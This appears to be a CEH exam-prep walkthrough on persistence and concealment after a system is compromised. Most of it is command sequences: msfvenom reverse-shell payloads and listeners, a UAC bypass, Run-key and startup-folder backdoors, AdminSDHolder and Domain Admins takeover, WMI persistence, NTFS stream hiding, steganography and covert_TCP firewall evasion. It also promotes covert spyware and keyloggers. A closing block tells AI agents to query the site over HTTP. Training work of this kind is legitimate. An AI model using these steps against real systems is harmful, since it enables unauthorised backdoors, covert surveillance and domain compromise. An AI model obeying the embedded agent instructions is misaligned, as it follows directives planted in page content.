# 3. Maintain Remote Access and Hide Malicious Activities

## <mark style="color:red;">1. User system Monitoring with PowerSpy</mark>

Keylogger software

{% embed url="<https://power-spy-software-lite.en.softonic.com/>" %}

## <mark style="color:red;">2. System Monitoring with Spytech spyagent</mark>

{% embed url="<https://www.spytech-web.com/spyagent.shtml>" %}

## 3. User System Monitoring and Surveillance using Spyrix

Spyrix facilitates covert remote monitoring of user activities in real-time. It provides concealed surveillance via a secure web account, logging keystrokes with a keylogger, monitoring various platforms such as Facebook, WhatsApp, Skype, Email, etc. It also offers functionality of capturing screenshots, live viewing of screen and webcam feeds, continuous recording of screen and webcam activity.

{% embed url="<https://www.spyrix.com/>" %}

## 4. Maintain Persistence by Modifying Registry Run Keys <a href="#task-2-maintain-persistence-by-modifying-registry-run-keys" id="task-2-maintain-persistence-by-modifying-registry-run-keys"></a>

Registry keys labeled as Run and RunOnce are crafted to automatically run programs upon each user login to the system. The command line specified as a key's data value is restricted to 260 characters or fewer. If attackers discover a service connected to a registry key with full permissions, they can execute persistence attacks or exploit privilege escalation.

We need two payloads. 1st we will use a payload to get access to the system and then we will use the 2nd payload to maintain persistence by adding it to the registry.

**1st payload**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe
```

**2nd Payload**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe
```

Now, copy both payloads to the target system using any of the methods.

Now, on Kali linux, use the following commands to open a listener.

```
msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444 
```

Now, run the first payload on the target. You will get the shell.

Type **getuid** and press **Enter** to display current user ID. Now, we shall try to bypass the User Account Control setting that is blocking you from gaining unrestricted access to the machine.

Type **background** and press **Enter**, to background the current session.

we will bypass Windows UAC protection via SilentCleanup task present in Windows Task Scheduler. It is present in Metasploit as a bypassuac\_silentcleanup exploit

n the terminal window, type **use exploit/windows/local/bypassuac\_silentcleanup** and press **Enter.** Now, type **set session 1** and press **Enter**.

<figure><img src="/files/rhtHO2yOjZb6ubL4Jfrs" alt=""><figcaption></figcaption></figure>

To set the **LHOST** option, type **set LHOST 10.10.1.13** and press **Enter**. To set the **TARGET** option, type **set TARGET 0** and press **Enter** (here, 0 indicates nothing, but the Exploit Target ID).Type **exploit** and press **Enter** to begin the exploit on **Windows 11** machine.

<figure><img src="/files/NGetLD5H8An6iSwIqMsp" alt=""><figcaption></figcaption></figure>

Type **getsystem -t 1** and press **Enter** to elevate privileges. Now, type **getuid** and press **Enter**. The Meterpreter session is now running with system privileges. Type shell to start shell.

<figure><img src="/files/OnPdV81gC4AHjm4l8p5p" alt=""><figcaption></figcaption></figure>

```
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
```

<figure><img src="/files/k0gARXKcnNZQZKXc3wWn" alt=""><figcaption></figcaption></figure>

Once the command is successfully executed, open another terminal window with root privileges and run **msfconsole** command. In Metasploit, type **use exploit/multi/handler** and press **Enter**. Now, type **set payload windows/meterpreter/reverse\_tcp** and press **Enter**. Type **set lhost 10.10.1.13** and press **Enter** to set lhost. Type **set lport 4444** and press **Enter** to set lport. Now, type **exploit** to start the exploitation.

Once, the PC restarts, we will get the shell.

## <mark style="color:red;">5. Hide files using NTFS ADS Streams</mark>

Copy calc from system32 folder to your test folder, Now create a text file

```
notepad readme.txt
```

<figure><img src="/files/GclLX9p5CcqbawGbzPCu" alt=""><figcaption></figcaption></figure>

You can type dir to check the size of file

<figure><img src="/files/cw2qhHnJ7coyGevf7jNl" alt=""><figcaption></figcaption></figure>

Now lets append calc to readme.txt

```
type calc.exe >readme.txt:calc.exe
```

<figure><img src="/files/4metdcSSvU1RWubGlrY6" alt=""><figcaption></figcaption></figure>

**The size does not change. Now create a link to the hidden file**

```
mklink backdoor.exe readme.txt:calc.exe
```

<figure><img src="/files/IXA0iWik2qBu6tEMduiZ" alt=""><figcaption></figcaption></figure>

opening backdoor.exe will run the calculator hidden in txt file.

<figure><img src="/files/cutUvOxLfpG5fWH7VfnC" alt=""><figcaption></figcaption></figure>

list hidden ADS streams

```
dir /r
```

<figure><img src="/files/iTg92xBoPTq4dtIyPTzV" alt=""><figcaption></figcaption></figure>

**Reference**

{% embed url="<https://cavementech.com/2022/05/mft-forensics.html#Alternate_Data_Streams_NTFS>" %}

### Appending Text File as ADS example

<figure><img src="/files/iyjEuVV0d2kTS5F1bY0T" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LV2CBTxv0Ew54pJ1Zqim" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">6. Hide data using white space steganography</mark>

Conceal messages in ACII text by adding white spaces to the end of line.

**Snow** tool is used which can add upto 7 spaces interspersed with tabs.

{% embed url="<https://darkside.com.au/snow/>" %}

Create a txt file and then use the following command to hide the message in the file.

```
SNOW.EXE -C -m "Hassan is my name" -p "magic" test.txt test2.txt
```

{% hint style="info" %}
-m is the message you want to hide

-p is the password

test.txt is the original file

test2.txt is the target file
{% endhint %}

<figure><img src="/files/L8ZfCqrBOhDmjU0NB8CD" alt=""><figcaption></figcaption></figure>

Opening test2.txt will not show us the hidden data. However, if we open the file in notepad and click edit>select all, we will see some hidden spaces.

<figure><img src="/files/7mjha8aJwgeq82JJyMtA" alt=""><figcaption></figcaption></figure>

To see the hidden message, use the following command.

```
SNOW.EXE -C -p "magic" test2.txt
```

<figure><img src="/files/cbrotSZ4BMPVodGjx35y" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">7. Image Steganography using OpenStego and Stegonline</mark>

### OpenStego

{% embed url="<https://www.openstego.com/>" %}

Select message file, cover file to hide data and click on hide

<figure><img src="/files/zxQSHpcNE34LXrMUo8Uq" alt=""><figcaption></figcaption></figure>

A new file will be created. It will open as an image but contains our message as well. Similarly extract data from the tool.

### Stegonline

{% embed url="<https://stegonline.georgeom.net/upload>" %}

Upload file, and then set the settings, remember the settings.

<figure><img src="/files/W0h2JlnVtwCfoHv3k9f5" alt=""><figcaption></figcaption></figure>

similarly, the data can be extracted from the image.

{% embed url="<https://youtu.be/aRHWfLrmZ8o?si=fBEGTvVS9FaA_110>" %}
Basic Image Steganography for Beginners
{% endembed %}

## <mark style="color:red;">8. Maintain persistence abusing boot or Logon autostart</mark>

After getting th admin meterpreter on remote machine, change to startup folder.

```
cd "C:\\ProgramData\Start Menu\Programs\\StartUp
```

check the working directory with pwd.

<figure><img src="/files/hPvjwUG2rLxHiF8DTYYc" alt=""><figcaption></figcaption></figure>

Now upload your, msfvenom payload here.

**Other tools**

{% embed url="<https://www.kali.org/tools/steghide/>" %}

{% embed url="<http://quickcrypto.com/free-steganography-software.html>" %}

## <mark style="color:red;">9. Maintain  Domain  Persistence exploiting Active Directory Objects</mark>

AdminSDHolder is an Active Directory container with the default security permissions, it is used

as a template for AD accounts and groups, such as Domain Admins, Enterprise Admins etc. to

protect them from unintentional modification of permissions.

If a user account is added into the access control list of AdminSDHolder, the user will acquire

"GenericAll" permissions which is equivalent to domain administrators.

After gaining the meterpreter session, upload powertools master.

```
upload -r /home/attacker/Power-Tools-Master C:\\users\\Administrator\\Downloads
```

<figure><img src="/files/aZhFnf36SQ9wXVPLVlGB" alt=""><figcaption></figcaption></figure>

Now enter the shell and start powershell

```
shell
powershell
```

Now change directory to powertools folder and use the following commands to add Martin user to ACL.

```
import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=system' -principalSamAccountName Martin -Verbose -Rights all
```

<figure><img src="/files/gJKLJ6377qRXkt9858dS" alt=""><figcaption></figcaption></figure>

To check the permissions, use the following commands

```
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs
```

<figure><img src="/files/nXWujlOEvhxf5pryeUiI" alt=""><figcaption></figcaption></figure>

<img src="/files/iKOFbL2mMabo0UD5Myee" alt="" data-size="original">

Now to add the user to admin group use th following command

```
net group "Domain Admins" Martin /add /domain
```

From powershell, we can use the following command to check the persistence

```
dir \\192.168.10.18\C$
```

<figure><img src="/files/v4LdQ4ShDtJTgPomUtJz" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">10. Priv Esc with WMI and maintain persistance</mark>

WMI (Windows Management Instrumentation) event subscription can be used to install event filters, providers, and bindings that execute code when a defined event occurs. It enables system administrators to perform tasks locally and remotely.

{% embed url="<https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1>" %}

Get a meterpreter session and upload the script, have a second msfvenom payload ready as well.

Now within meterpreter load powershell

```
load powershell
powershell_shell
```

<figure><img src="/files/Lv3CW79vxwmEyCIIiegR" alt=""><figcaption></figcaption></figure>

Now type the following commands to run the script

```
Import-Module ./WMI-Persistence.ps1
install-Persistence -Trigger Startup -Payload "C:\users\administrators\downloads\exploit.exe"
```

Now listen with multi handler on msf. In 5-10 minutes, you will get an admin shell.

## <mark style="color:red;">11. Covert channels using covert\_TCP</mark>

Networks use network access control permissions to permit or deny the traffic flowing through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, and web proxies to allow certain traffic. Covert channels can be created by inserting data into the unused fields of protocol headers. There are many unused or misused fields in TCP or IP over which data can be sent to bypass firewalls. The Covert\_TCP program manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act like a server as well as a client and can be used to hide the data transmitted inside an IP header. This is useful when bypassing firewalls and sending data with legitimate-looking packets that contain no data for sniffers to analyze. A professional ethical hacker or pen tester must understand how to carry covert traffic inside the unused fields of TCP and IP headers.

**Sending Machine**

Download the tool on your sending machine

```
wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
```

<figure><img src="/files/2FJ73fkM4uorH8b5ZtvC" alt=""><figcaption></figcaption></figure>

Now compile it.

```
sudo apt install gcc
cc -o covert_tcp covert_tcp.c
```

<figure><img src="/files/xNvSDU5NcLrwESs35TED" alt=""><figcaption></figcaption></figure>

**2nd Machine**

Compile the tool there as well. Now open the tcpdump listener.

```
sudo su
tcpdump -nvvX port 8888 -i lo  // do not need to, we dont get anything here
```

Start the listener

```
sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 8888 -dest_port 9999 -server -file /home/user/msg1.txt
```

<figure><img src="/files/ySzJrIwv6pyZ0PfKe4p2" alt=""><figcaption></figcaption></figure>

Now , from the sending machine send the message.

```
sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 9999 -dest_port 8888 -file /home/kali/msg.txt
```

<figure><img src="/files/lYvWVSctIIGwzPayWgyE" alt=""><figcaption></figcaption></figure>

We, will get the text file as well in the same folder.

<figure><img src="/files/rTwBjmzikSzM9KEvB8pb" alt=""><figcaption></figcaption></figure>

{% embed url="<https://youtu.be/GjpaWNGfD-8>" %}
Covert Communication
{% endembed %}

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}
CEH V13 full course
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-6.-system-hacking/3.-maintain-remote-access-and-hide-malicious-activities.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.